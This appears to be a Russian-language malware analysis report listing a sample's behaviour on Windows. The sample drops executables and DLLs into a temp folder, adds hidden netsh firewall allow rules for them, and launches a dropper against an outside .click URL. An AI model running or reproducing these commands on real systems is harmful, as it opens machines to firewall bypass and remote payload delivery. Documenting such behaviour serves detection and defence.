Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=lemymyquufcftpd dir=in action=allow program="%TEMP%\nse1BAB.tmp\lemymyquufcftpd.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=lemymyquufcftpd dir=out action=allow program="%TEMP%\nse1BAB.tmp\lemymyquufcftpd.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nse1bab.tmp\nsexec.dll
- %TEMP%\nse1bab.tmp\basiccalculator1.exe
- %TEMP%\nse1bab.tmp\dlpro2505.exe
- %TEMP%\nse1bab.tmp\lemymyquufcftpd.exe
- %TEMP%\nse1bab.tmp\lemymyquufcftpd.exe.config
- %TEMP%\nse1bab.tmp\selfdel.dll
- %TEMP%\nse1bab.tmp\basiccalculator1.exe
- %TEMP%\nse1bab.tmp\dlpro2505.exe
- %TEMP%\nse1bab.tmp\lemymyquufcftpd.exe
- %TEMP%\nse1bab.tmp\lemymyquufcftpd.exe.config
- %TEMP%\nse1bab.tmp\nsexec.dll
- %TEMP%\nse1bab.tmp\selfdel.dll
- '%TEMP%\nse1bab.tmp\lemymyquufcftpd.exe' "http://www.fortificationspans.click" "%TEMP%\nse1BAB.tmp\6"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=lemymyquufcftpd dir=out action=allow program="%TEMP%\nse1BAB.tmp\lemymyquufcftpd.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=lemymyquufcftpd dir=in action=allow program="%TEMP%\nse1BAB.tmp\lemymyquufcftpd.exe" enable=yes profile=public,private (со скрытым окном)